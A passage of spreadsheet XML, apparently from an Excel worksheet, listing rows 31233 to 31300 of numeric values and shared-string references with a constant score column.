        <v>11256.0</v>
      </c>
      <c r="B31233" s="2">
        <v>2.0578435E7</v>
      </c>
      <c r="C31233" s="2" t="s">
        <v>30034</v>
      </c>
      <c r="D31233" s="2">
        <v>1.0</v>
      </c>
      <c r="E31233" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31233" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31234" ht="15.75" customHeight="1">
      <c r="A31234" s="1">
        <v>11421.0</v>
      </c>
      <c r="B31234" s="2">
        <v>2.1697408E7</v>
      </c>
      <c r="C31234" s="2" t="s">
        <v>30035</v>
      </c>
      <c r="D31234" s="2">
        <v>1.0</v>
      </c>
      <c r="E31234" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31234" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31235" ht="15.75" customHeight="1">
      <c r="A31235" s="1">
        <v>11471.0</v>
      </c>
      <c r="B31235" s="2">
        <v>2.1959077E7</v>
      </c>
      <c r="C31235" s="2" t="s">
        <v>30036</v>
      </c>
      <c r="D31235" s="2">
        <v>1.0</v>
      </c>
      <c r="E31235" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31235" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31236" ht="15.75" customHeight="1">
      <c r="A31236" s="1">
        <v>11538.0</v>
      </c>
      <c r="B31236" s="2">
        <v>2.2591857E7</v>
      </c>
      <c r="C31236" s="2" t="s">
        <v>30037</v>
      </c>
      <c r="D31236" s="2">
        <v>1.0</v>
      </c>
      <c r="E31236" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31236" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31237" ht="15.75" customHeight="1">
      <c r="A31237" s="1">
        <v>11662.0</v>
      </c>
      <c r="B31237" s="2">
        <v>2.3343054E7</v>
      </c>
      <c r="C31237" s="2" t="s">
        <v>30038</v>
      </c>
      <c r="D31237" s="2">
        <v>1.0</v>
      </c>
      <c r="E31237" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31237" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31238" ht="15.75" customHeight="1">
      <c r="A31238" s="1">
        <v>11929.0</v>
      </c>
      <c r="B31238" s="2">
        <v>2.5414732E7</v>
      </c>
      <c r="C31238" s="2" t="s">
        <v>30039</v>
      </c>
      <c r="D31238" s="2">
        <v>1.0</v>
      </c>
      <c r="E31238" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31238" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31239" ht="15.75" customHeight="1">
      <c r="A31239" s="1">
        <v>12021.0</v>
      </c>
      <c r="B31239" s="2">
        <v>2.6051383E7</v>
      </c>
      <c r="C31239" s="2" t="s">
        <v>30040</v>
      </c>
      <c r="D31239" s="2">
        <v>1.0</v>
      </c>
      <c r="E31239" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31239" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31240" ht="15.75" customHeight="1">
      <c r="A31240" s="1">
        <v>12176.0</v>
      </c>
      <c r="B31240" s="2">
        <v>2.7452521E7</v>
      </c>
      <c r="C31240" s="2" t="s">
        <v>30041</v>
      </c>
      <c r="D31240" s="2">
        <v>1.0</v>
      </c>
      <c r="E31240" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31240" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31241" ht="15.75" customHeight="1">
      <c r="A31241" s="1">
        <v>12476.0</v>
      </c>
      <c r="B31241" s="2">
        <v>2.9468592E7</v>
      </c>
      <c r="C31241" s="2" t="s">
        <v>30042</v>
      </c>
      <c r="D31241" s="2">
        <v>1.0</v>
      </c>
      <c r="E31241" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31241" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31242" ht="15.75" customHeight="1">
      <c r="A31242" s="1">
        <v>13331.0</v>
      </c>
      <c r="B31242" s="2">
        <v>3.4641539E7</v>
      </c>
      <c r="C31242" s="2" t="s">
        <v>30043</v>
      </c>
      <c r="D31242" s="2">
        <v>1.0</v>
      </c>
      <c r="E31242" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31242" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31243" ht="15.75" customHeight="1">
      <c r="A31243" s="1">
        <v>13443.0</v>
      </c>
      <c r="B31243" s="2">
        <v>3.5147989E7</v>
      </c>
      <c r="C31243" s="2" t="s">
        <v>30044</v>
      </c>
      <c r="D31243" s="2">
        <v>1.0</v>
      </c>
      <c r="E31243" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31243" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31244" ht="15.75" customHeight="1">
      <c r="A31244" s="1">
        <v>14252.0</v>
      </c>
      <c r="B31244" s="2">
        <v>3.836868E7</v>
      </c>
      <c r="C31244" s="2" t="s">
        <v>30045</v>
      </c>
      <c r="D31244" s="2">
        <v>1.0</v>
      </c>
      <c r="E31244" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31244" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31245" ht="15.75" customHeight="1">
      <c r="A31245" s="1">
        <v>14580.0</v>
      </c>
      <c r="B31245" s="2">
        <v>4.0128992E7</v>
      </c>
      <c r="C31245" s="2" t="s">
        <v>30046</v>
      </c>
      <c r="D31245" s="2">
        <v>1.0</v>
      </c>
      <c r="E31245" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31245" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31246" ht="15.75" customHeight="1">
      <c r="A31246" s="1">
        <v>14716.0</v>
      </c>
      <c r="B31246" s="2">
        <v>4.063349E7</v>
      </c>
      <c r="C31246" s="2" t="s">
        <v>30047</v>
      </c>
      <c r="D31246" s="2">
        <v>1.0</v>
      </c>
      <c r="E31246" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31246" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31247" ht="15.75" customHeight="1">
      <c r="A31247" s="1">
        <v>14963.0</v>
      </c>
      <c r="B31247" s="2">
        <v>4.1336724E7</v>
      </c>
      <c r="C31247" s="2" t="s">
        <v>30048</v>
      </c>
      <c r="D31247" s="2">
        <v>1.0</v>
      </c>
      <c r="E31247" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31247" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31248" ht="15.75" customHeight="1">
      <c r="A31248" s="1">
        <v>15028.0</v>
      </c>
      <c r="B31248" s="2">
        <v>4.1553656E7</v>
      </c>
      <c r="C31248" s="2" t="s">
        <v>30049</v>
      </c>
      <c r="D31248" s="2">
        <v>1.0</v>
      </c>
      <c r="E31248" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31248" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31249" ht="15.75" customHeight="1">
      <c r="A31249" s="1">
        <v>15126.0</v>
      </c>
      <c r="B31249" s="2">
        <v>4.1887267E7</v>
      </c>
      <c r="C31249" s="2" t="s">
        <v>30050</v>
      </c>
      <c r="D31249" s="2">
        <v>1.0</v>
      </c>
      <c r="E31249" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31249" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31250" ht="15.75" customHeight="1">
      <c r="A31250" s="1">
        <v>15402.0</v>
      </c>
      <c r="B31250" s="2">
        <v>4.2832816E7</v>
      </c>
      <c r="C31250" s="2" t="s">
        <v>30051</v>
      </c>
      <c r="D31250" s="2">
        <v>1.0</v>
      </c>
      <c r="E31250" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31250" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31251" ht="15.75" customHeight="1">
      <c r="A31251" s="1">
        <v>15464.0</v>
      </c>
      <c r="B31251" s="2">
        <v>4.3114975E7</v>
      </c>
      <c r="C31251" s="2" t="s">
        <v>30052</v>
      </c>
      <c r="D31251" s="2">
        <v>1.0</v>
      </c>
      <c r="E31251" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31251" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31252" ht="15.75" customHeight="1">
      <c r="A31252" s="1">
        <v>15471.0</v>
      </c>
      <c r="B31252" s="2">
        <v>4.3133737E7</v>
      </c>
      <c r="C31252" s="2" t="s">
        <v>30053</v>
      </c>
      <c r="D31252" s="2">
        <v>1.0</v>
      </c>
      <c r="E31252" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31252" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31253" ht="15.75" customHeight="1">
      <c r="A31253" s="1">
        <v>16752.0</v>
      </c>
      <c r="B31253" s="2">
        <v>4.7593917E7</v>
      </c>
      <c r="C31253" s="2" t="s">
        <v>30054</v>
      </c>
      <c r="D31253" s="2">
        <v>1.0</v>
      </c>
      <c r="E31253" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31253" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31254" ht="15.75" customHeight="1">
      <c r="A31254" s="1">
        <v>17113.0</v>
      </c>
      <c r="B31254" s="2">
        <v>4.875439E7</v>
      </c>
      <c r="C31254" s="2" t="s">
        <v>30055</v>
      </c>
      <c r="D31254" s="2">
        <v>1.0</v>
      </c>
      <c r="E31254" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31254" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31255" ht="15.75" customHeight="1">
      <c r="A31255" s="1">
        <v>17432.0</v>
      </c>
      <c r="B31255" s="2">
        <v>4.9736417E7</v>
      </c>
      <c r="C31255" s="2" t="s">
        <v>30056</v>
      </c>
      <c r="D31255" s="2">
        <v>1.0</v>
      </c>
      <c r="E31255" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31255" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31256" ht="15.75" customHeight="1">
      <c r="A31256" s="1">
        <v>17436.0</v>
      </c>
      <c r="B31256" s="2">
        <v>4.9737928E7</v>
      </c>
      <c r="C31256" s="2" t="s">
        <v>30057</v>
      </c>
      <c r="D31256" s="2">
        <v>1.0</v>
      </c>
      <c r="E31256" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31256" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31257" ht="15.75" customHeight="1">
      <c r="A31257" s="1">
        <v>18324.0</v>
      </c>
      <c r="B31257" s="2">
        <v>5.2401591E7</v>
      </c>
      <c r="C31257" s="2" t="s">
        <v>30058</v>
      </c>
      <c r="D31257" s="2">
        <v>1.0</v>
      </c>
      <c r="E31257" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31257" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31258" ht="15.75" customHeight="1">
      <c r="A31258" s="1">
        <v>18434.0</v>
      </c>
      <c r="B31258" s="2">
        <v>5.2743157E7</v>
      </c>
      <c r="C31258" s="2" t="s">
        <v>30059</v>
      </c>
      <c r="D31258" s="2">
        <v>1.0</v>
      </c>
      <c r="E31258" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31258" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31259" ht="15.75" customHeight="1">
      <c r="A31259" s="1">
        <v>18451.0</v>
      </c>
      <c r="B31259" s="2">
        <v>5.2787533E7</v>
      </c>
      <c r="C31259" s="2" t="s">
        <v>30060</v>
      </c>
      <c r="D31259" s="2">
        <v>1.0</v>
      </c>
      <c r="E31259" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31259" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31260" ht="15.75" customHeight="1">
      <c r="A31260" s="1">
        <v>19128.0</v>
      </c>
      <c r="B31260" s="2">
        <v>5.47653E7</v>
      </c>
      <c r="C31260" s="2" t="s">
        <v>30061</v>
      </c>
      <c r="D31260" s="2">
        <v>1.0</v>
      </c>
      <c r="E31260" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31260" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31261" ht="15.75" customHeight="1">
      <c r="A31261" s="1">
        <v>19682.0</v>
      </c>
      <c r="B31261" s="2">
        <v>5.6453451E7</v>
      </c>
      <c r="C31261" s="2" t="s">
        <v>30062</v>
      </c>
      <c r="D31261" s="2">
        <v>1.0</v>
      </c>
      <c r="E31261" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31261" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31262" ht="15.75" customHeight="1">
      <c r="A31262" s="1">
        <v>19958.0</v>
      </c>
      <c r="B31262" s="2">
        <v>5.7531044E7</v>
      </c>
      <c r="C31262" s="2" t="s">
        <v>30063</v>
      </c>
      <c r="D31262" s="2">
        <v>1.0</v>
      </c>
      <c r="E31262" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31262" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31263" ht="15.75" customHeight="1">
      <c r="A31263" s="1">
        <v>20352.0</v>
      </c>
      <c r="B31263" s="2">
        <v>1.1657938E7</v>
      </c>
      <c r="C31263" s="2" t="s">
        <v>30064</v>
      </c>
      <c r="D31263" s="2">
        <v>1.0</v>
      </c>
      <c r="E31263" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31263" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31264" ht="15.75" customHeight="1">
      <c r="A31264" s="1">
        <v>21268.0</v>
      </c>
      <c r="B31264" s="2">
        <v>2.0087495E7</v>
      </c>
      <c r="C31264" s="2" t="s">
        <v>30065</v>
      </c>
      <c r="D31264" s="2">
        <v>1.0</v>
      </c>
      <c r="E31264" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31264" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31265" ht="15.75" customHeight="1">
      <c r="A31265" s="1">
        <v>21439.0</v>
      </c>
      <c r="B31265" s="2">
        <v>2.2305972E7</v>
      </c>
      <c r="C31265" s="2" t="s">
        <v>30066</v>
      </c>
      <c r="D31265" s="2">
        <v>1.0</v>
      </c>
      <c r="E31265" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31265" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31266" ht="15.75" customHeight="1">
      <c r="A31266" s="1">
        <v>22588.0</v>
      </c>
      <c r="B31266" s="2">
        <v>3.9053229E7</v>
      </c>
      <c r="C31266" s="2" t="s">
        <v>30067</v>
      </c>
      <c r="D31266" s="2">
        <v>1.0</v>
      </c>
      <c r="E31266" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31266" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31267" ht="15.75" customHeight="1">
      <c r="A31267" s="1">
        <v>22789.0</v>
      </c>
      <c r="B31267" s="2">
        <v>4.5424172E7</v>
      </c>
      <c r="C31267" s="2" t="s">
        <v>30068</v>
      </c>
      <c r="D31267" s="2">
        <v>1.0</v>
      </c>
      <c r="E31267" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31267" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31268" ht="15.75" customHeight="1">
      <c r="A31268" s="1">
        <v>23592.0</v>
      </c>
      <c r="B31268" s="2">
        <v>6352561.0</v>
      </c>
      <c r="C31268" s="2" t="s">
        <v>30069</v>
      </c>
      <c r="D31268" s="2">
        <v>1.0</v>
      </c>
      <c r="E31268" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31268" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31269" ht="15.75" customHeight="1">
      <c r="A31269" s="1">
        <v>23718.0</v>
      </c>
      <c r="B31269" s="2">
        <v>7199635.0</v>
      </c>
      <c r="C31269" s="2" t="s">
        <v>30070</v>
      </c>
      <c r="D31269" s="2">
        <v>1.0</v>
      </c>
      <c r="E31269" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31269" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31270" ht="15.75" customHeight="1">
      <c r="A31270" s="1">
        <v>23762.0</v>
      </c>
      <c r="B31270" s="2">
        <v>7517763.0</v>
      </c>
      <c r="C31270" s="2" t="s">
        <v>30071</v>
      </c>
      <c r="D31270" s="2">
        <v>1.0</v>
      </c>
      <c r="E31270" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31270" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31271" ht="15.75" customHeight="1">
      <c r="A31271" s="1">
        <v>24125.0</v>
      </c>
      <c r="B31271" s="2">
        <v>1.0012419E7</v>
      </c>
      <c r="C31271" s="2" t="s">
        <v>30072</v>
      </c>
      <c r="D31271" s="2">
        <v>1.0</v>
      </c>
      <c r="E31271" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31271" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31272" ht="15.75" customHeight="1">
      <c r="A31272" s="1">
        <v>24266.0</v>
      </c>
      <c r="B31272" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C31272" s="2" t="s">
        <v>30073</v>
      </c>
      <c r="D31272" s="2">
        <v>1.0</v>
      </c>
      <c r="E31272" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31272" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31273" ht="15.75" customHeight="1">
      <c r="A31273" s="1">
        <v>24702.0</v>
      </c>
      <c r="B31273" s="2">
        <v>1.1657937E7</v>
      </c>
      <c r="C31273" s="2" t="s">
        <v>30074</v>
      </c>
      <c r="D31273" s="2">
        <v>1.0</v>
      </c>
      <c r="E31273" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31273" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31274" ht="15.75" customHeight="1">
      <c r="A31274" s="1">
        <v>24793.0</v>
      </c>
      <c r="B31274" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C31274" s="2" t="s">
        <v>30075</v>
      </c>
      <c r="D31274" s="2">
        <v>1.0</v>
      </c>
      <c r="E31274" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31274" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31275" ht="15.75" customHeight="1">
      <c r="A31275" s="1">
        <v>25607.0</v>
      </c>
      <c r="B31275" s="2">
        <v>1.4396325E7</v>
      </c>
      <c r="C31275" s="2" t="s">
        <v>30076</v>
      </c>
      <c r="D31275" s="2">
        <v>1.0</v>
      </c>
      <c r="E31275" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31275" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31276" ht="15.75" customHeight="1">
      <c r="A31276" s="1">
        <v>25725.0</v>
      </c>
      <c r="B31276" s="2">
        <v>1.4541555E7</v>
      </c>
      <c r="C31276" s="2" t="s">
        <v>30077</v>
      </c>
      <c r="D31276" s="2">
        <v>1.0</v>
      </c>
      <c r="E31276" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31276" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31277" ht="15.75" customHeight="1">
      <c r="A31277" s="1">
        <v>26124.0</v>
      </c>
      <c r="B31277" s="2">
        <v>1.5912121E7</v>
      </c>
      <c r="C31277" s="2" t="s">
        <v>30078</v>
      </c>
      <c r="D31277" s="2">
        <v>1.0</v>
      </c>
      <c r="E31277" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31277" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31278" ht="15.75" customHeight="1">
      <c r="A31278" s="1">
        <v>26387.0</v>
      </c>
      <c r="B31278" s="2">
        <v>1.6999988E7</v>
      </c>
      <c r="C31278" s="2" t="s">
        <v>30079</v>
      </c>
      <c r="D31278" s="2">
        <v>1.0</v>
      </c>
      <c r="E31278" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31278" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31279" ht="15.75" customHeight="1">
      <c r="A31279" s="1">
        <v>26572.0</v>
      </c>
      <c r="B31279" s="2">
        <v>1.7883471E7</v>
      </c>
      <c r="C31279" s="2" t="s">
        <v>30080</v>
      </c>
      <c r="D31279" s="2">
        <v>1.0</v>
      </c>
      <c r="E31279" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31279" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31280" ht="15.75" customHeight="1">
      <c r="A31280" s="1">
        <v>26641.0</v>
      </c>
      <c r="B31280" s="2">
        <v>1.8046118E7</v>
      </c>
      <c r="C31280" s="2" t="s">
        <v>30081</v>
      </c>
      <c r="D31280" s="2">
        <v>1.0</v>
      </c>
      <c r="E31280" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31280" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31281" ht="15.75" customHeight="1">
      <c r="A31281" s="1">
        <v>26767.0</v>
      </c>
      <c r="B31281" s="2">
        <v>1.8483438E7</v>
      </c>
      <c r="C31281" s="2" t="s">
        <v>30082</v>
      </c>
      <c r="D31281" s="2">
        <v>1.0</v>
      </c>
      <c r="E31281" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31281" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31282" ht="15.75" customHeight="1">
      <c r="A31282" s="1">
        <v>26960.0</v>
      </c>
      <c r="B31282" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C31282" s="2" t="s">
        <v>30083</v>
      </c>
      <c r="D31282" s="2">
        <v>1.0</v>
      </c>
      <c r="E31282" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31282" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31283" ht="15.75" customHeight="1">
      <c r="A31283" s="1">
        <v>27056.0</v>
      </c>
      <c r="B31283" s="2">
        <v>2.0327713E7</v>
      </c>
      <c r="C31283" s="2" t="s">
        <v>30084</v>
      </c>
      <c r="D31283" s="2">
        <v>1.0</v>
      </c>
      <c r="E31283" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31283" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31284" ht="15.75" customHeight="1">
      <c r="A31284" s="1">
        <v>27185.0</v>
      </c>
      <c r="B31284" s="2">
        <v>2.0873122E7</v>
      </c>
      <c r="C31284" s="2" t="s">
        <v>30085</v>
      </c>
      <c r="D31284" s="2">
        <v>1.0</v>
      </c>
      <c r="E31284" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31284" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31285" ht="15.75" customHeight="1">
      <c r="A31285" s="1">
        <v>27671.0</v>
      </c>
      <c r="B31285" s="2">
        <v>2.2928154E7</v>
      </c>
      <c r="C31285" s="2" t="s">
        <v>30086</v>
      </c>
      <c r="D31285" s="2">
        <v>1.0</v>
      </c>
      <c r="E31285" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31285" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31286" ht="15.75" customHeight="1">
      <c r="A31286" s="1">
        <v>27836.0</v>
      </c>
      <c r="B31286" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C31286" s="2" t="s">
        <v>30087</v>
      </c>
      <c r="D31286" s="2">
        <v>1.0</v>
      </c>
      <c r="E31286" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31286" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31287" ht="15.75" customHeight="1">
      <c r="A31287" s="1">
        <v>28031.0</v>
      </c>
      <c r="B31287" s="2">
        <v>2.4450881E7</v>
      </c>
      <c r="C31287" s="2" t="s">
        <v>30088</v>
      </c>
      <c r="D31287" s="2">
        <v>1.0</v>
      </c>
      <c r="E31287" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31287" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31288" ht="15.75" customHeight="1">
      <c r="A31288" s="1">
        <v>28073.0</v>
      </c>
      <c r="B31288" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C31288" s="2" t="s">
        <v>30089</v>
      </c>
      <c r="D31288" s="2">
        <v>1.0</v>
      </c>
      <c r="E31288" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31288" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31289" ht="15.75" customHeight="1">
      <c r="A31289" s="1">
        <v>28667.0</v>
      </c>
      <c r="B31289" s="2">
        <v>2.7489658E7</v>
      </c>
      <c r="C31289" s="2" t="s">
        <v>30090</v>
      </c>
      <c r="D31289" s="2">
        <v>1.0</v>
      </c>
      <c r="E31289" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31289" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31290" ht="15.75" customHeight="1">
      <c r="A31290" s="1">
        <v>28740.0</v>
      </c>
      <c r="B31290" s="2">
        <v>2.8076112E7</v>
      </c>
      <c r="C31290" s="2" t="s">
        <v>30091</v>
      </c>
      <c r="D31290" s="2">
        <v>1.0</v>
      </c>
      <c r="E31290" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31290" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31291" ht="15.75" customHeight="1">
      <c r="A31291" s="1">
        <v>28940.0</v>
      </c>
      <c r="B31291" s="2">
        <v>2.9641281E7</v>
      </c>
      <c r="C31291" s="2" t="s">
        <v>30092</v>
      </c>
      <c r="D31291" s="2">
        <v>1.0</v>
      </c>
      <c r="E31291" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31291" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31292" ht="15.75" customHeight="1">
      <c r="A31292" s="1">
        <v>29008.0</v>
      </c>
      <c r="B31292" s="2">
        <v>2.9969532E7</v>
      </c>
      <c r="C31292" s="2" t="s">
        <v>30093</v>
      </c>
      <c r="D31292" s="2">
        <v>1.0</v>
      </c>
      <c r="E31292" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31292" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31293" ht="15.75" customHeight="1">
      <c r="A31293" s="1">
        <v>29569.0</v>
      </c>
      <c r="B31293" s="2">
        <v>3.3251886E7</v>
      </c>
      <c r="C31293" s="2" t="s">
        <v>30094</v>
      </c>
      <c r="D31293" s="2">
        <v>1.0</v>
      </c>
      <c r="E31293" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31293" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31294" ht="15.75" customHeight="1">
      <c r="A31294" s="1">
        <v>29854.0</v>
      </c>
      <c r="B31294" s="2">
        <v>3.576704E7</v>
      </c>
      <c r="C31294" s="2" t="s">
        <v>30095</v>
      </c>
      <c r="D31294" s="2">
        <v>1.0</v>
      </c>
      <c r="E31294" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31294" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31295" ht="15.75" customHeight="1">
      <c r="A31295" s="1">
        <v>29870.0</v>
      </c>
      <c r="B31295" s="2">
        <v>3.5931656E7</v>
      </c>
      <c r="C31295" s="2" t="s">
        <v>30096</v>
      </c>
      <c r="D31295" s="2">
        <v>1.0</v>
      </c>
      <c r="E31295" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31295" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31296" ht="15.75" customHeight="1">
      <c r="A31296" s="1">
        <v>30124.0</v>
      </c>
      <c r="B31296" s="2">
        <v>3.6889936E7</v>
      </c>
      <c r="C31296" s="2" t="s">
        <v>30097</v>
      </c>
      <c r="D31296" s="2">
        <v>1.0</v>
      </c>
      <c r="E31296" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31296" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31297" ht="15.75" customHeight="1">
      <c r="A31297" s="1">
        <v>30358.0</v>
      </c>
      <c r="B31297" s="2">
        <v>3.8290697E7</v>
      </c>
      <c r="C31297" s="2" t="s">
        <v>30098</v>
      </c>
      <c r="D31297" s="2">
        <v>1.0</v>
      </c>
      <c r="E31297" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31297" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31298" ht="15.75" customHeight="1">
      <c r="A31298" s="1">
        <v>30407.0</v>
      </c>
      <c r="B31298" s="2">
        <v>3.8764735E7</v>
      </c>
      <c r="C31298" s="2" t="s">
        <v>30099</v>
      </c>
      <c r="D31298" s="2">
        <v>1.0</v>
      </c>
      <c r="E31298" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31298" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31299" ht="15.75" customHeight="1">
      <c r="A31299" s="1">
        <v>30668.0</v>
      </c>
      <c r="B31299" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C31299" s="2" t="s">
        <v>30100</v>
      </c>
      <c r="D31299" s="2">
        <v>1.0</v>
      </c>
      <c r="E31299" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31299" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31300" ht="15.75" customHeight="1">
      <c r="A31300" s="1">
